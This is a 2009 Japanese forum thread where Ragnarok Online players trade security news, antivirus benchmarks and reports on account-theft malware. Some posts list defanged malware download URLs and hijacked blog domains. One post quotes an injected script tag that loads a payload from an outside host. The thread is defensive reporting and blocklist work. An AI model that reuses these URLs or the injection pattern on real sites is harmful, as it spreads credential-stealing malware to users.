>安全性が確認できないプログラムを仮想環境で実行してみることができる
>「仮想実行スペース」機能を搭載した。

>ゲーム中はスケジュールされたスキャンや更新処理をスキップする
>「ゲーム・モード」などの機能を追加している。

カスペも10月にでるね <> (○口○*)さん<>sage<>09/09/02 20:41 ID:s7jPTVsG0<> IISのFTPに脆弱性
ttp://www.microsoft.com/japan/technet/security/advisory/975191.mspx <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/09/02 21:14 ID:qzD7onIw0<> >>462-465
引用元については徹底できていない部分もあるので、
hostsだけで無く気をつけたいところです。

あとフィッシングは指摘されていなかったら気が付かなかったです。
ありがとうございます。 <> (○口○*)さん<>sage<>09/09/03 00:08 ID:4zveWVQa0<> ATOKに脆弱性、修正用のアップデートモジュールが公開
ttp://internet.watch.impress.co.jp/docs/news/20090902_312550.html

>対象となる製品は、Windows版のATOK 2009/2008/2007/2006、ATOK定額制サービス、
>「ジャストスマイル4」に含まれるATOKスマイル。これらの製品を搭載した一太郎シリーズ、
>JUST Suiteシリーズも含まれる。

>情報処理推進機構(IPA)によれば、脆弱性はWindowsのスクリーンロック制限を回避
>できてしまうというもの。ATOKがインストールされている場合に、特定の操作を行うことで
>スクリーンロックのパスワード制限などを回避し、任意のプログラムを実行することが
>可能になるという。

アカハックには繋がらないだろうけど、Atok使いは導入を推奨。 <> (○口○*)さん<>sage<>09/09/03 02:34 ID:n7wvZzd50<> マカフィーの検出力がここのところ上がってきてるみたいだけど
アカハックウイルスや日本特有のウイルスに対してはどうなんだろう? <> (○口○*)さん<>sage<>09/09/03 02:58 ID:O3haqIrv0<> そういう話題は荒れるからやめようぜ。
それでもしたいなら荒れ放題な2chセキュ板でどうぞ。 <> (○口○*)さん<>sage<>09/09/03 03:01 ID:ClQyUVgB0<> >>471
検体提出する人がいるかどうかだけの問題。 <> (○口○*)さん<>sage<>09/09/03 07:41 ID:Pvg6hF4i0<> 取り敢えず無料アップグレード使って試した>バスター2010
ので人柱的報告

OS:Windows7RC 64Bit
バスター:2010 64Bit

この状態でROを稼働
nPro関連の例外設定は全く設定せず、デフォルト設定状態で普通にROが起動して
遊べる事を確認

ただまあバスターはパッチ1つでダメになる事が多々あるんで何の参考にもならんとは
思うけど取り敢えずメモ的に <> (○口○*)さん<>sage<>09/09/03 07:44 ID:Pvg6hF4i0<> 書き忘れてた

クイック検索:確かに早くなった
メモリ使用量:環境が違いすぎて比較が微妙(メイン環境はXP 32Bit)
ぱっと見た感じは若干へった?様な気がする
CPU負荷:若干へった?様な気がする

何か体感レポばかりでスマン <> (○口○*)さん<>sage<>09/09/03 12:08 ID:/YtDuRjJ0<> いやいや十分っす
2009で軽量化して、それを受け継いだんだろうな <> (○口○*)さん<>sage<>09/09/04 13:27 ID:9lfROMT70<> マイクロソフト、9月の月例パッチは“緊急”5件
ttp://internet.watch.impress.co.jp/docs/news/20090904_312967.html
>マイクロソフトは4日、9月9日に公開を予定している月例セキュリティ更新プログラム(修正パッチ)の予定を公表した。
>今回は、5件の修正パッチを予定しており、脆弱性の最大深刻度はいずれも4段階で最も高い“緊急”。
>5件ともWindows関連の脆弱性を修正する。

マイクロソフト セキュリティ情報の事前通知 2009年9月
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-sep.mspx <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/09/04 22:50 ID:5+j1ZdHj0<> もう来年が冠名になっているソフトが出揃ってくる時期ですね。
チラリ見かけたのでこんなのも。

・エフセキュア 「エフセキュア インターネット セキュリティ2010」発表
http://www.f-secure.com/ja_JP/about-us/pressroom/news/2009/fs-news_20090904_01_jp.html

上のだとPentium4準拠で、うちのPCだとスペックに届いていなかったり。
使用感はノータッチなので判りません。


>>474-476
バスターなら現在のROの公式最低スペックでも大丈夫と言うのが救いかも。
09は確かに07や08より軽かったので自分も様子見してから10に移行するつもりです。
でも流石にそろそろ買い替えかなあ…。 <> (○口○*)さん<>sage<>09/09/05 01:54 ID:1rCDUiEx0<> ふるまい検知技術を強化した「BitDefender 2010」シリーズ
http://internet.watch.impress.co.jp/docs/news/20090904_313029.html

Free版はどうなるんだろう。 <> 474<>sage<>09/09/05 07:19 ID:qQe5MS4m0<> バスター2010追加報告

セットアップ時、旧環境(俺の所だと2009)が残って居る場合、希にセットアップ中の
アンインストールで失敗する事がある
セットアップでのトロイ検索とかを続行してやると再びアンインストール等を行い、
セットアップは(見た目では)正常に終了する

同じ症状はAVG8.5から環境を移行した64Bit版でも発生

メモリ使用量チェック(タスクマネージャーの表記を使用)

SfCtlCom
2009 値取り忘れ
2010(32) 11508k
2010(64) 6200k

TMBMSRV
2009 12624k
2010(32) 13492k
2010(64) 4256k

TmPfw
2009 8428k
2010(32) 9648k
2010(64) 5728k

TmProxy
2009 10204k
2010(32) 11400k
2010(64) 3968k <> (○口○*)さん<>sage<>09/09/05 07:20 ID:qQe5MS4m0<> 続き

UfSeAgnt
2009 値取り忘れ
2010(32) 1380k
2010(64) 764k

御覧の通り、メモリ使用量減ったのは64Bit版の話で、32Bit版は全体的に微増と言う結果に


CPU負荷(クイック検索でチェック)、クイック検索の時間

UfNavi
2009 値取り忘れ
2010(32) メモリ 26192k CPU 最大で3% クイック検索時間 1分10秒
2010(64) メモリ 10720k CPU 最大で32% クイック検索時間 3分

SfCtlCom
2009 値取り忘れ
2010(32) メモリ 11508k → 19360k CPU 最大で25%
2010(64) メモリ 6200k → 11600k CPU 最大で97%

テスト環境
2009と2010(32) CPU C2Q Q9550(2.83G) WinXP Home(32) SP3 メモリ4G
2010(64) CPU CeleronD 2.80G Win7RC(64) メモリ1.5G

Win7環境はもっとマシなPCでやってやるともう少しいい値が出そうな気がします <> (○口○*)さん<>sage<>09/09/09 02:24 ID:rOdwqV6l0<> >>480
報告乙。
念のため保守。 <> (○口○*)さん<><>09/09/09 03:16 ID:LWN2JPUk0<> >>477 >>474-475,480-481 報告感謝です。

MicrosoftUpdate月例パッチがダウンロードが出来ます。
緊急を要する物ばかりなので、すぐにでも
Microsoft Updateを利用して更新プログラムのインストールをして
OSのアップデートをお忘れずに。 <> (○口○*)さん<><>09/09/09 08:55 ID:aBAs5iKu0<> 月例age
セキュリティ情報 計5件 (緊急 5件)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-sep.mspx
ttp://blogs.technet.com/jpsecurity/archive/2009/09/04/3279078.aspx <> (○口○*)さん<>sage<>09/09/09 11:28 ID:B/bpvqiu0<> PG2いれてたら、リストにあるドメイン全部読み込まなく成るって事でおk?
ちょい怪しいURL踏んでしまって PG2が点滅してたんだ……
其の場合はセフセフ? アウアウ?

一応VB2009で検索掛けたが 何も見つからなかった <> (○口○*)さん<>sage<>09/09/09 11:58 ID:i61P4O8s0<> 「車をバックしているときに障害物センサーがなったんだけどバックしても大丈夫?」って言われてそれだけで状況把握できるかっての <> (○口○*)さん<>sage<>09/09/09 12:35 ID:B/bpvqiu0<> 【      気付いた日時          】 2009/9/9 11時
【不審なアドレスのクリックの有無 】 gamepaslog■com/watch/sm3683942/
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 No
【     OS    】 WinXP HomeEdition Ver2002 ServicePack3
【使用ブラウザ 】 InternetExplorer 6.02900
【WindowsUpdateの有無】 8月26日
【 アンチウイルスソフト 】 ウイルスバスター2009
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】
カスペルスキーオンラインスキャンはバージョンアップした辺りから
エラーが出て検索できなくなったので断念
VB2009のスキャン結果は何も無し

【スレログやテンプレを読んだか】 今から読みます
【hostsファイルの変更】(有/最終更新は覚えていません BSWikiに会った奴です)
【PeerGuardian2の導入】(有/リネージュ資料室の物を全て)
【説明】
上記のURLを踏んでしまいました
其の瞬間、PG2のアイコンが点滅し 
CN(zhangweijp)61.139.126.53を3回ブロックしていました

焦ってテンプレ埋めずに書き込んでしまいました <> (○口○*)さん<>sage<>09/09/09 13:14 ID:euFORi670<> >ブロックしていました
したなら正常動作なんだから問題ないんじゃ?

保証はしませんが <> (○口○*)さん<>sage<>09/09/09 16:05 ID:oYrmMLFC0<> 見覚えのある危険ドメインだが、PG2がブロックしたならアクセスしてないので、
危険なファイルを読み込む訳がない。 <> (○口○*)さん<>sage<>09/09/09 19:36 ID:sPOm5ZBk0<> >>487
・ニフティのウイルスチェックサービス
http://www.nifty.com/security/vcheck/kav/kavwebscan.html

カスペ本家でのオンラインスキャンが出来ない人向けに、
こっちもテンプレ入りした方がいいかも。 <> (○口○*)さん<>age<>09/09/10 11:23 ID:Mf7a+zqj0<> Firefox 3.5.3がリリースされたようです。
重要度最高の脆弱性を3つ。低の脆弱性が1つ。
更新はお早めに。 <> (○口○*)さん<>sage<>09/09/11 20:30 ID:fUf2uF5J0<> 「QuickTime 7.6.4」は4件の脆弱性を修正、Win/Mac版とも影響
http://internet.watch.impress.co.jp/docs/news/20090910_314644.html <> (○口○*)さん<>sage<>09/09/12 12:40 ID:zrw2Drmx0<> mixiに貼られていたらしきもの。
mixiでは、最近、一般のアプロだに置かれたファイルへのリンクの形での報告しか見ない気がします。

ttp://www1■uploda■tv/v/uptv0044955■rar
ttp://www■uproda■net/down/uproda000761■rar

カスペ検出名:Trojan.Win32.Pincav.f <> (○口○*)さん<>sage<>09/09/12 14:49 ID:NUyUbI1m0<> それはrarの中に格納されているんではなくて、拡張子偽装? <> (○口○*)さん<>sage<>09/09/12 15:43 ID:zrw2Drmx0<> >>494
格納されてるが、rarのままでも検出可能 <> (○口○*)さん<>sage<>09/09/14 14:32 ID:OdukSF090<> またしても福建一味によりメイプル系のFC2ブログがハッキングされIFRAME注入される事例発生。
開始が2008年末、最終更新が9/12である事を考えれば乗っ取りで間違いない。

maberasu252■blog67■fc2■com/
末尾に4gameranking入り

そしていつものハニーポット状態の赤石掲示板に書き込まれたのが14日の11時ごろ。
やられたのは9/12-14の間かな?

通報する際毎回IFRAME対策すれば中華に悪用されなくなるって言っているのに無視し続けるからこうなるわけだけど。
無駄だったり余計な機能を付ける割にこういうのは疎かにするから危なくて仕方ない。
FC2バックアップなんて余計危なくて使えないわ。

ブログ持ちは管理に気をつけてくれよな! <> (○口○*)さん<>sage<>09/09/14 14:36 ID:f5NXXxtr0<> ブログ乗っ取り=ブログ管理人がウイルス感染、ということでいいの? <> (○口○*)さん<>sage<>09/09/14 14:51 ID:c0qqUNSn0<> ブログパーツ(を使うためのscriptやiframe)を一切認めないか、ホワイトリスト運用でもしないと
他のブログだってアカウントハックされたら一緒なんだよな。
手順が確立しているから効率面でfc2ばかり狙っているのかと思う。 <> (○口○*)さん<>sage<>09/09/14 15:01 ID:3qqgkqe50<> >>効率面でどこそこばかり狙っている

人の目でいちいち攻撃対象の絞り込み・確認なんかしてなさそう。

無差別絨毯爆撃しまくって、ヒットしてるのが結果として
対策に熱心でない特定のサイトばかりになってるだけ。 <> (○口○*)さん<>sage<>09/09/14 20:44 ID:L33TgQTg0<> たしかFC2はXSSの脆弱性を指摘されてるけどそのままだよね。
前にあったテンプレート大量改ざん事件も中間報告から放置されてるし
半年ほど放置されてるブログが2週間ぐらい前に改ざんされてたし
根本的にシステム一新しないとどうにもならない状態なのかも。

目立たないようにいくつか罠ブログを作ったり改ざんして掲示板に投下
通報されてそれが使えなくなると、また違うブログ2〜3個作るか改ざんする、の繰り返し。
一度にやられる数が少ないからFC2運営もそれほど気にしてないのかもね。 <> (○口○*)さん<>sage<>09/09/14 20:49 ID:WCt0gCLx0<> 最近改組はいっぱい聞くけど、アカハックの被害報告自体はかなり減ってる気がする
なんでだろう <> (○口○*)さん<>sage<>09/09/14 20:53 ID:3dViyKsZ0<> 改組 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>09/09/15 01:03 ID:bc4AxfRn0<> 運営の対応や対処方法も出尽くしたから、こっちに報告が来ないだけやも。

被害については対策がされていない他のMMOに場所を移して行われているので
ROでの被害が聴かれなくなったってだけかもですが。
スレ的にはOKではある…のかな…。


でも運営の対策やらユーザーの対処やらで旨みが無くなった…とは言え
運営が手を抜いたらBOTは増えるし脆弱性を突かれたらアウトだし
改竄されたドメインの先には複合種のトロイが待ち構えているので、
正直MMOやるやらないにせよ油断がならない感が。

罠ブログでFC2への仕込みがよく見受けられるけど、
こうも頻繁にあるとこの間発表があった公式ファンサイトの筋で
FC2系がやられてしまった日にはって想像が悪い方に働いてしまう。 <> (○口○*)さん<>sage<>09/09/15 10:44 ID:yEnnj74z0<> リネージュ資料室の更新リストに、dnf9m■exeが上がってたんで、同じドメイン配下のexeも拾ってみた。
この検体自体は、ほとんどのベンダーが対応してると思うので詳細は割愛。(9/1〜9/9頃更新されてた)

p://tt■ff88567■cn/down/cqsj9m■exe
p://tt■ff88567■cn/down/dj9m■exe
p://tt■ff88567■cn/down/dnf9m■exe
p://tt■ff88567■cn/down/jxsj9m■exe
p://tt■ff88567■cn/down/mhxu9m■exe
p://tt■ff88567■cn/down/mu9m■exe
p://tt■ff88567■cn/down/qq3g9m■exe
p://tt■ff88567■cn/down/qqhx9m■exe
p://tt■ff88567■cn/down/qqma■exe
p://tt■ff88567■cn/down/rxcq9m■exe
p://tt■ff88567■cn/down/tl9m■exe
p://tt■ff88567■cn/down/tx29m■exe
p://tt■ff88567■cn/down/wd9m■exe
p://tt■ff88567■cn/down/wl9m■exe
p://tt■ff88567■cn/down/zt9m■exe
p://tt■ff88567■cn/down/zx9m■exe
p://tt■ff88567■cn/down/zzh9m■exe
p://tt■ff88567■cn/bbs/exe/[1-100]■exe

で、リネージュ資料室のリストで中国ブロックしてるんだけど、PG2が反応しなかった。
取り敢えず、ローカルに置いてる追加リストに手動で下記を追加して対応。

CHINANET-GD:113.96.0.0-113.111.255.255

他にもこの辺が抜けてるみたいなので、ブロックリストに追加。(危険URLを含むのではなく、中国なのでブロックリストに入れる意味で)
CHINANET-GD:61.145.0.0-61.145.255.255
CHINANET-GD:116.4.0.0-116.7.255.255
CHINANET-GD:116.16.0.0-116.31.255.255
CHINANET-GD:119.120.0.0-119.127.255.255
CHINANET-GD:119.128.0.0-119.143.255.255
CHINANET-GD:119.144.0.0-119.147.255.255 <> (○口○*)さん<>sage<>09/09/15 15:17 ID:yEnnj74z0<> >504の件で、ブロック範囲がところどころ漏れてるのかなと、てきとーにブロック範囲追加リスト作ってみました。
ttp://www.mmobbs.com/uploader/files/7625.zip

こいつ(↓)を使って、netname(CHINANET-GDみたいの)から、IP範囲を検索してまとめたものです。
 ttp://wq.apnic.net/apnic-bin/whois.pl
検索したnetnameは、CHINANET-GDで検索して出てきた、spamメールやBBSspamの送信元から適当に抽出。
中国全部をカバーしてる訳じゃないです。

リネージュ資料室のリストと併用して少しは抜けが減るといいな程度の扱いで。
転載や既存リストへのマージなど、ご自由にどうぞ。 <> (○口○*)さん<>sage<>09/09/15 15:25 ID:lKddvT6u0<> 「まな板」などで国別リストを作ればいいと思う <> (○口○*)さん<>sage<>09/09/15 18:11 ID:yEnnj74z0<> mixiに投稿されたもの。いずれも同じファイル。
最近mixiで報告あるのは、一般のアプロだにあげられたこの手のファイルばっかですね。

p://www1■uploda■tv/v/uptv0045723■zip
p://www1■uploda■tv/v/uptv0045727■zip
p://www1■uploda■tv/v/uptv0045729■zip

Trojan.Win32.Pincav.f


>>506
スタンドアローン版が落とせないんだ。どっかにないかね。そのためだけにスクリプト入れるのもどうかと思うし。 <> (○口○*)さん<>sage<>09/09/15 18:35 ID:lKddvT6u0<> >>507
おや。スタンドアローン版はリンク切れなのか
2chのPG2スレを見たらrir_allocというツールもあるみたい↓
PeerGuardian 37
ttp://hideyoshi.2ch.net/test/read.cgi/download/1250866488/5
(敢えてダウンロード先へのリンクはしないでおきます) <> (○口○*)さん<>sage<>09/09/15 20:34 ID:AB27fMjD0<> >>504
そのドメインの文字の羅列から奴らが狙ってるネトゲが良くわかるよね。
tt : リネージュ
ff : FF
dnf : アラド

でもなぜかroは含まれないな、サブドメインがttだからそちらにroがあるかもね。
最近の動静からしてもROは現在攻撃対象としては下火で
偶然でも抜ければみっけもん程度なのかも知れぬ。

奴らの事、忘れたころにゼロデイやら大規模攻撃を仕掛けたりして来るやも知れぬ。
油断大敵、気をつけてくれよな! <> (○口○*)さん<>sage<>09/09/16 01:14 ID:a1yRw/Iz0<> 未だにmixiの日記でroの文字列に反応してやってくるしね <> (○口○*)さん<>sage<>09/09/16 02:43 ID:F7g4cURo0<> ROに関する日記だけでも、「友人の友人まで」にしておくと吉 <> (○口○*)さん<>sage<>09/09/16 15:29 ID:EPpsOMeh0<> 今朝、各地にwww1.uploda.tvなアドレスのアップローダに上げたウイルスファイルの
アドレスを投稿している輩が出現した模様。
ウイルスはAvira AntiVirではTR/Crypt.ZPACK.Genと判定。VirusTotalでは30/41で陽性。

Date : 1253043393(2009/09/16 04:36:33)
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 143.90.183.138(ofsfx-05p4-138.ppp11.odn.ad.jp)
ブラウザ設定が中国語だったのでそれを条件に拒絶可能でした。

ご注意下さい。 <> (○口○*)さん<>sage<>09/09/16 18:11 ID:OWlwPUNH0<> >>512
多分、>>507と同じものでしょう。 <> (○口○*)さん<>sage<>09/09/16 19:31 ID:jhu5tdLj0<> そうですね。 <> (○口○*)さん<>sage<>09/09/16 20:58 ID:QppLxyZf0<> なんつか、またodnかって感じ。 <> (○口○*)さん<>sage<>09/09/16 21:07 ID:LUbZjJhP0<> 決まってODNなのは特定少数が中華用の串でも立ててんのかね <> (○口○*)さん<>sage<>09/09/16 23:23 ID:yBM/Au0v0<> 10年くらい前から荒らし御用達ホストだな <> (○口○*)さん<>sage<>09/09/17 00:49 ID:z4jCZUP40<> 本人確認がザルなのは柔銀系列共通の穴だし <> (○口○*)さん<>sage<>09/09/17 07:53 ID:Owx5xLDy0<> >>508
PeerGuardian 37
ttp://hideyoshi.2ch.net/test/read.cgi/download/1250866488/10

10 名前:[名無し]さん(bin+cue).rar[] 投稿日:2009/08/22(土) 00:04:27 ID:8WmCUTLS0
<上記がめんどくさく他の国のリストもほしい人用>
IPList for PeerGuardian2
ttp://iplist.wave.prohosting.com/

どうせならこっちのほうがいいんじゃね <> (○口○*)さん<>sage<>09/09/17 14:40 ID:nsiJS2h60<> 削除依頼スレで出てたアドレス誰か捕捉してない?

アドレス確認する前にあぼーんだったので、検体入手できてないんだ。 <> (○口○*)さん<>sage<>09/09/17 14:47 ID:G3+eqEMu0<> エラースレ(Ragnarok板)の364に張られてたのなら
www1■uploda■tv/v/uptv0046047■zip

削除依頼と入れ違いで消されてて仕事早いなと思った <> (○口○*)さん<>sage<>09/09/17 14:58 ID:nsiJS2h60<> >>521
さんきゅー。>>507と全く同じバイナリでした。 <> (○口○*)さん<>sage<>09/09/20 14:31 ID:rBQAxn/80<> また福建一味に放置されたネトゲと無関係な一般FC2ブログが改竄されていつもの掲示板にリンクが投下されていた。
raimujuice■blog103■fc2■com
記事が2008年2月と3月の9件しかない上、URLを検索すると9月はじめにメイプル向け攻撃で使用した形跡あり。
このことから乗っ取りで間違いない。
いつものように最下部に4gamerankingのIFRAME

ネトゲと無関係でそれらしいワードすらないようだが連中はどうやってこれを見つけ出したんだか。

ホントFC2ブログは穴だらけだな、FC2のルールはアメリカ法で日本法じゃないから対策や改善する義務もないってか。
危険極まりないな。
FC2ブログ持ちはすべて改竄の順番待ち状態と考えるのが利口なのかも知れぬ。

ともあれブログ持ちは気をつけてくれよな! <> (○口○*)さん<>sage<>09/09/20 16:57 ID:JC5R1N+G0<> >>523
通報するとすぐに消されるところを見ると
わざわざfc2が捜索はしないけど
通報があったら削除という方針なんでしょう <> (○口○*)さん<>sage<>09/09/20 17:04 ID:w0JdXxCg0<> 通報しても対応しないどっかのオンラインゲーム運営会社とは大違いだな <> (○口○*)さん<>sage<>09/09/20 17:25 ID:4EnmbQEf0<> 小違い…くらいかなぁ <> (○口○*)さん<>sage<>09/09/20 19:16 ID:tcrgX8en0<> >>524
残念だが通報してもすぐには消されない。
>>523のやつは9/12に通報済み。
他に業者が作ったと思われる罠入りブログを2つ同じ日に通報済みだけど未だ現役。
他のブログサービスだともっと対応早いんだけどね。

それ以外にfc2と紛らわしいURLでframeで勝手にfc2ブログ呼び出して
その下にステルスframeで4gamerankingが入っているのもメープルしたらばに投下されてた。 <> (○口○*)さん<>sage<>09/09/21 00:21 ID:3RmuFsia0<> 根本的な問題として、三日坊主で管理もほったらかしにするのに、Blogという媒体に手を出す
ユーザーも安易な考え方を改めてもらわないとね。
Blogエンジンそのものは決して軽量とは言えない。spam-TBに狙われたりすると一層それが表面化する。
MovableTypeの再構築負荷問題などはつとに有名。

それに、newbieユーザーは過度に装飾を好む傾向にある。重量級ブログパーツをごてごてと貼り付けたり。
結果として、サイト運営側のコストもペイし辛くなって来ている様子が窺える。
お蔭で、webryやamebloのように、RSS広告を導入してRSSの手軽さを失わせている状態だ。

日々の書き捨てレベルなら、それこそミニブログというもっと適した媒体がある。今持て囃されているtwitterなど
まさに適格なのではあるまいか。 <> にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん (○口○*)さん<>sage<>09/09/22 08:37 ID:Min3P8090<> >>529
死ねカス <> (○口○*)さん<>sage<>09/09/22 09:09 ID:w6ipHWZS0<> >>529
死ねカス
>>4

>>507,521 <> (○口○*)さん<>sage<>09/09/22 09:14 ID:JTcecc0R0<> >>529
危険なzip置かれることもあるあぷろだだってだけ。それはただの画像だろ。
偽装jpegというのもあるが、今回は違うみたい。 <> (○口○*)さん<>sage<>09/09/22 09:18 ID:JTcecc0R0<> あー、追記。

死ねカスとコメントついてるのは、スレのルールを守っていないから。

>・アカハックアドレスはMMOBBSでは禁止単語になっています。
> 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
> .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)

今回は、危険なものではなかったのでいいのですが、危険なアドレスだった場合、加害者の片棒を担ぐような行為に
なってしまいますので、アドレスをそのままで貼り付けないようにご注意ください。

p://www1■uploda■tv/v/uptv0046263■jpg といった形で、間違ってクリックしても、そのリンクに行かないように
配慮して投稿してください。 <> (○口○*)さん<>sage<>09/09/22 09:59 ID:2zRzI/PL0<> >>530-533
どうもすみませんでした。
URLの頭の部分を消したつもりが、
コピペの間違いで消えていなかったようです。

その他のアドレス等気をつけます
ありがとうございました <> (○口○*)さん<>sage<>09/09/22 11:41 ID:T8jc9Jur0<> >URLの頭の部分を消したつもりが、
それもダメ、専ブラはhttpいじった程度だと補完する
意味があってのルールなんだから、スレ利用するならちゃんとテンプレに従ってくれ <> (○口○*)さん<>sage<>09/09/22 15:54 ID:bnQLXXdC0<> 大雑把にしか読んでないと堂々と書くくらいだし、鑑定してくれる便利なスレとしか思ってないんだろう <> (○口○*)さん<>sage<>09/09/22 16:13 ID:BRfmjtcM0<> 駆け込みだと面倒くさがってテンプレも読まないだろうなあって考えると
結局>>536なんだな <> (○口○*)さん<>sage<>09/09/22 19:24 ID:0De03+IJ0<> こっちも面倒だからスルーしてるけどなw <> (○口○*)さん<>sage<>09/09/23 03:41 ID:Cv16MMQi0<> 削除依頼は出したの? <> (○口○*)さん<>sage<>09/09/23 11:11 ID:kHoDJ8dG0<> >>539
ああいうのは予防的な意味で即削除依頼でいいと思ってるけど
俺が見た時にはすでに>>532ついてたからほっといた

でも速攻で叩くぐらいなら削除依頼もしてくれw <> (○口○*)さん<>sage<>09/09/23 14:30 ID:vY/OLXPW0<> 昨日うちのHPに不思議なホストから中華が飛んできていた。
そのホスト名はXREAであった。

そのログを抜粋すると
接続ホスト名 s324■xrea■com
訪問回数 1回
ユーザーエージェント Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; QQDownload 1.7;
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)/pc

QQは言わずもがな中華が大好きな奴だ、この来訪者は中華で間違いない。
QQDownloadでぐぐると似たようなユーザーエージェント(UA)
*にゃんこのセキュリティメモ
ttp://nyankosec.blog.shinobi.jp/Entry/170/
(ODN以外ほぼ一致のUA)

しかしホストがxreaとは珍しい。
またしてもXREA上で何かあったのだろうか?

ここのところ中華の個人サイト狙いの攻撃も激化して来ているようだし、気をつけねばなるまいて。
中華が大好きな赤石関係でもレッドストーンウォーカーズと言う情報サイトがやられたとか何とか。
ホント油断もすきもありゃしない。
気をつけてくれよな! <> (○口○*)さん<>sage<>09/09/23 14:52 ID:Lr7DNLzI0<> ?
CGIプロクシくらい普通に設置できるだろう <> (○口○*)さん<>sage<>09/09/23 19:59 ID:PKp/vfkR0<> ウォーカーズはGeno亜種による偶然じゃないかと思ってたけど中華っぽい
サイト持ってる人は注意してください
FTPの使用はやめたほうがいいね

検出可否報告スレに検体提出済みだけど現在こんなかんじ
ad_top.swf (6/41)
ttp://www.virustotal.com/jp/analisis/dd1561557258f32ae7a6d85cf3ccd3c3096f6534212c708189a15842c83e7bd4-1253696940
google_service.js (2/41)
ttp://www.virustotal.com/jp/analisis/4d03bd8928887cc45bfa882de5a6a682739c733af20536738979d67c2200fc20-1253698635

提出前はMicrosoftのみがad_top.swfを黒判定
ノートンはヒューリスティックで反応していた模様
swfのほうは4/6が中華お得意のDirektShowとの判定
このswfファイルはバイナリでいつものところに仕込まれてるタイプとは違った
Aviraは両方ともCLEANとの判定

判定結果はまだ一部であり、有志に提出していただいた分すべての結果が
出たわけではないけど、まだほとんどのアンチウイルスがスルー
他のサイトに仕掛けられていてもわからないかもしれない <> (○口○*)さん<>sage<>09/09/23 20:29 ID:PKp/vfkR0<> 仕込まれ方はこんなかんじでした
検体がほしい人は直接向こうの664を見てください

<ul>
<li>本文</li>
<li>本文</li>
  ・・・
<li>本文</li>
</ul><script src=http ://loan-5■sakura■ne■jp/bank-loan/google_service.js></script>
<p>本文</p>

注意としては
・スクリプトの場所がjpドメインなので見逃しやすい
・ピンポイント爆撃だとすれば注入パターンは毎回変わる可能性がある
・他にも置き場所があるかもしれないし、直接置くものもでてくる可能性がある

さくらにも通報しときます <> (○口○*)さん<>sage<>09/09/23 20:50 ID:PKp/vfkR0<> 閲覧できません (Forbidden access)

さくら・・・>< <> (○口○*)さん<>sage<>09/09/23 20:54 ID:PKp/vfkR0<> メールで送れました。スレ汚しごめんなさい。 <> (○口○*)さん<>sage<>09/09/24 07:22 ID:pJabUfmT0<> ODN再発

Date : 1253720979(2009/09/24 00:49:39)
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 219.67.121.243(ofsfx-03p4-243.ppp11.odn.ad.jp)

内容
http://www■uproda■net/down/uproda000885.zip

アップローダ使用の手口とHOSTから推測される地域とファイルのウイルス検出名が
同一なので恐らく同一犯。
ISP通報済み。期待はしてないのでODNからの投稿禁止処置も併用中。 <> (○口○*)さん<>sage<>09/09/24 22:03 ID:6F6EIMaG0<> windows7でnpro
ttp://d.hatena.ne.jp/kyunya/20090512/1242126955
こんな記事を発見、GameGuardを強引に対応させる方法らしい
ROでこれが動くか分からないけど、誰か検証する価値はあるのかな?

nProはIRCのDCCsend(ファイル送受信)にも悪影響を与えたりするし
なんだかんだで悪評は高いけどもこういうパッチははたしてどうなのか・・・
新OSで動かすためとは言え、抜け道である以上は公式のサポートもないわけだから自己責任で <> (○口○*)さん<>sage<>09/09/24 22:07 ID:mQZEv/xu0<> クライアント改造の記事をここに書くとか・・・ <> (○口○*)さん<>sage<>09/09/25 08:42 ID:PK7CPckD0<> アカハックでもセキュリティでもない話題だな <> (○口○*)さん<>sage<>09/09/25 18:42 ID:aycDfllz0<> ローグチェイサwikiの複数ページにウィルスと思われるURLが記述されました。
aguseでたどったらサーバーはやはり中国でした

http://www■snsatfb■com/video/playatataqa.zip <> (○口○*)さん<>sage<>09/09/25 19:31 ID:wmOMkKA70<> >>551
playatataq1a12.exe 中身9/13に提出済み (28/40)
http://www.virustotal.com/jp/analisis/226a4f21de7bcc8b4dbe19b12535d0a2a81e2617fbe45f1efcdb8f44270dcc42-1252854813 <> (○口○*)さん<>sage<>09/09/26 00:02 ID:McXEsh+c0<> >>551
同じアドレスを書き込まれそうになり防ぎました。

Date : 1253859378(2009/09/25 15:16:18)
UA : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP : 61.201.50.145(ofsfx-03p2-145.ppp11.odn.ad.jp)

恐らく再々発。ODNには良くある事。通報済み。 <> (○口○*)さん<>sage<>09/09/26 11:48 ID:KTRKG7gm0<> 某鯖のGvWikiの中の人ですが
>>551と全く同じ書き込みをされて居ました
アドレスは>>553と全く同じ、時間が16時11分頃

[ 2009-09-25 (金) 16:11:37 ] [ 61.201.50.145 ] [ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ]

片っ端からwiki漁ってコピペって行ったのかねぇ <> (○口○*)さん<>sage<>09/09/29 06:51 ID:uIk5qpQF0<> 無償のウイルス対策ソフト“avast!”に脆弱性、対応済みの最新版v4.8.1356が公開
ttp://www.forest.impress.co.jp/docs/news/20090928_318035.html <> (○口○*)さん<>sage<>09/09/29 08:57 ID:67KG2nV+0<> 拡張子をUnicode制御文字RLOで偽装する話
http://www.atmarkit.co.jp/fsecurity/rensai/tipstoday08/tips01.html

その筋では以前より知られた話だそうですが、やり方は誰でもすぐにできるほど簡単。
しかしこれを知らなければ、アイコン偽装とセットで騙される人は多いかも。
対策方法も書かれています。 <> (○口○*)さん<>sage<>09/09/29 09:02 ID:aE6l4T2i0<> >>556
その記事にツッコミを…

